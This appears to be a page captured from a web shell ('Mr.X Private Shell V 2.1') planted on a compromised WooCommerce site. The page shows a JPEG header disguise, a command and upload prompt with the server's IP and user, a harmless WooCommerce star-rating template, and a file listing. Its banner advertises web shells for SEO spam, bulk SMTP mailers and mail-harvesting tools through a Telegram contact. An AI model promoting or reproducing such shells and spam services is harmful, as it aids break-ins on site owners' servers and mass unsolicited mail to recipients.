����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.216.24: ~ $
<?php
/**
 * Star-rating control partial.
 *
 * Theme-overridable. Copy to `yourtheme/woocommerce/order/star-rating.php`.
 *
 * @see https://woocommerce.com/document/template-structure/
 * @package WooCommerce\Templates
 * @version 10.8.0
 *
 * @var string             $name      Form field name (e.g. `reviews[123][rating]`).
 * @var string             $id_prefix Prefix used for unique radio ids.
 * @var string             $label_id  Existing label id; bound via aria-labelledby.
 * @var int                $selected  Pre-selected value (0 = none).
 * @var array<int, string> $labels    Map of value (1-5) to caption text.
 */

defined( 'ABSPATH' ) || exit;

$caption_id      = $id_prefix . '-caption';
$initial_caption = $selected > 0 && isset( $labels[ $selected ] ) ? $labels[ $selected ] : '';

// Reverse so row-reverse + `~` selectors can fill stars 1..N without `:has()`.
$reversed = array_reverse( $labels, true );
?>
<div
	class="woocommerce-star-rating"
	role="radiogroup"
	aria-labelledby="<?php echo esc_attr( $label_id ); ?>"
	aria-describedby="<?php echo esc_attr( $caption_id ); ?>"
>
	<div class="woocommerce-star-rating__stars">
		<?php foreach ( $reversed as $value => $label ) : ?>
			<?php
			$input_id = $id_prefix . '-' . $value;
			$checked  = $value === $selected;
			?>
			<input
				class="woocommerce-star-rating__input"
				type="radio"
				id="<?php echo esc_attr( $input_id ); ?>"
				name="<?php echo esc_attr( $name ); ?>"
				value="<?php echo esc_attr( (string) $value ); ?>"
				data-label="<?php echo esc_attr( $label ); ?>"
				<?php checked( $checked ); ?>
			/>
			<label class="woocommerce-star-rating__star" for="<?php echo esc_attr( $input_id ); ?>">
				<span class="screen-reader-text">
					<?php
					printf(
						/* translators: 1: numeric star rating 2: label text e.g. "Good" */
						esc_html__( '%1$d out of 5 stars: %2$s', 'woocommerce' ),
						(int) $value,
						esc_html( $label )
					);
					?>
				</span>
				<svg
					class="woocommerce-star-rating__icon"
					width="24"
					height="24"
					viewBox="0 0 24 24"
					aria-hidden="true"
					focusable="false"
				>
					<path d="M12 2.5l2.92 6.36 6.99.74-5.21 4.74 1.46 6.86L12 17.77l-6.16 3.43 1.46-6.86L2.09 9.6l6.99-.74L12 2.5z" />
				</svg>
			</label>
		<?php endforeach; ?>
	</div>

	<span
		id="<?php echo esc_attr( $caption_id ); ?>"
		class="woocommerce-star-rating__caption"
		aria-live="polite"
	><?php echo esc_html( $initial_caption ); ?></span>
</div>

Filemanager

Name Type Size Permission Actions
attribution-details.php File 4.96 KB 0644
customer-history.php File 1.54 KB 0644
customer-review-order-empty.php File 1.56 KB 0644
customer-review-order-row.php File 5.34 KB 0644
customer-review-order.php File 5.69 KB 0644
form-tracking.php File 2.84 KB 0644
order-again.php File 848 B 0644
order-details-customer.php File 3.02 KB 0644
order-details-fulfillment-item.php File 3.06 KB 0644
order-details-fulfillments.php File 6.87 KB 0644
order-details-item.php File 2.65 KB 0644
order-details.php File 5.09 KB 0644
order-downloads.php File 3 KB 0644
star-rating.php File 2.43 KB 0644
tracking.php File 2.15 KB 0644